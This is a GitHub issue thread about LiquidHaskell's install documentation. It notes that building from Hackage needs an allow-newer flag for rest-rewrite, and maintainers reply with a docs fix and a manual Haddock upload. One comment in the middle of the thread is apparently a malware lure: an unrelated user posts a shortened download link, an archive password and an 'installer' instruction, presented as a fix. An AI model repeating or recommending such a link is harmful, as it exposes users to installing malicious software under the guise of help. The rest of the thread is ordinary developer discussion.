### ISSUE TITLE
Docs are too optimistic about building from Hackage

### ISSUE THREAD

**Issue by ulysses4ever** [ucsd-progsys/liquidhaskell#2322]
`docs/mkDocs/docs/install.md` says:

> Depending on your version of GHC, you might want to use a build of LiquidHaskell from github or from Hackage.
> 
> - ghc-9.10.1: use liquidhaskell-0.9.10.1 from Hackage or use LiquidHaskell from github
> - ghc-9.8.2: use liquidhaskell-0.9.8.2 from Hackage
> - ghc-9.6.3: use liquidhaskell-0.9.6.3 from Hackage
> - ghc-9.4.7: use liquidhaskell-0.9.4.7.0 from Hackage
 
This is not true for the Hackage part because of the `allow-newer` you employ in the project file. I checked that only one is actually required to depend on a Hackage release: `--allow-newer="rest-rewrite:containers"` and opened  https://github.com/zgrannan/rest/issues/43 to hopefully fix it. But going forward you may want to either reconsider your workflow (e.g. to have a separate project file for releases, that would be more strict about allow-newer's) or to update the docs to say that the user may need to employ allow-newer.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by facundominguez** [comment]
Well noted. I think hinting about `--allow-newer="rest-rewrite:containers"` would be fair.

**Comment by facundominguez** [comment]
Another option is to allow building without rest-rewrite.

**Comment by facundominguez** [comment]
Warned about the need for allow-newer in https://github.com/ucsd-progsys/liquidhaskell/commit/29e89fb758eb2b08afdd0ebcd9860bd7aacb73bf.

**Comment by ulysses4ever** [comment]
Looks good, thanks! Feel free to close whenever...

**Comment by ulysses4ever** [comment]
I'm sorry for being late but Hackage actually had trouble building it for some other reason: https://hackage.haskell.org/package/liquidhaskell-0.9.10.1/reports/2 It's a little sad not only on its own but also because then there's no Haddocks. Could you perhaps upload the docs manually? @facundominguez

**Comment by facundominguez** [comment]
:wave: Among other potential errors, LH cannot be built because z3 would need to be available.

The haddock documentation is uploaded now.

**Comment by ulysses4ever** [comment]
Oh, right... Thank you!
